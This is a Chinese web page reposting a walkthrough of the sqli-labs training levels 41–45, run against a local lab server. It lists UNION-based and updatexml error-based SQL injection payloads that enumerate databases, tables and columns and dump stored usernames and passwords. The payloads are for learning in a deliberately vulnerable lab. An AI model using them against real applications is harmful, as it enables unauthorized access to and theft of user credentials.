欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 焦点 > sql-labs41-45关通关攻略

sql-labs41-45关通关攻略

2024/12/27 11:15:17 来源:https://blog.csdn.net/m0_75036923/article/details/141638390  浏览:    关键词:sql-labs41-45关通关攻略

第41关

一.查询数据库

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+

二.查表

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

三.查列

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

四.查user表里所有数据

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+

第42关

一.登录页面

二.查询数据库

在密码框里输入
'and updatexml(1,concat(~,(select database()),~),1)

三.查表 

在密码框里输入
'and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1) 


 四.查列

在密码框里输入

'and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

 第43关

一.登录页面

二. 查询数据库

在密码框里输入
') and updatexml(1,concat(~,(select database()),~),1) 


三.查表名

在密码框里输入
') and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1)


 

四.查列


') and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

第44关

一.查询数据库

在密码框中输入

1' union select 1,database(),3 #

二.查表

在密码框中输入1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

 

三.查列

在密码框中输入1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

 

第45关

一.查询数据库

在密码框中输入1') union select 1,database(),3 #

二.查表

在密码框中输入1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

三.查列

在密码框中输入1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

vue3组件调用解决奇怪问题的详细记录...were passed to component but could not be automatically inherited because... E-commerce .net+React(一)——项目初始化 uni-app 跨端开发精美开源UI框架推荐 三.统一异常Exception拦截处理 各种网站(学习资源及其他) 面试题整理12----K8s中Pod创建常见错误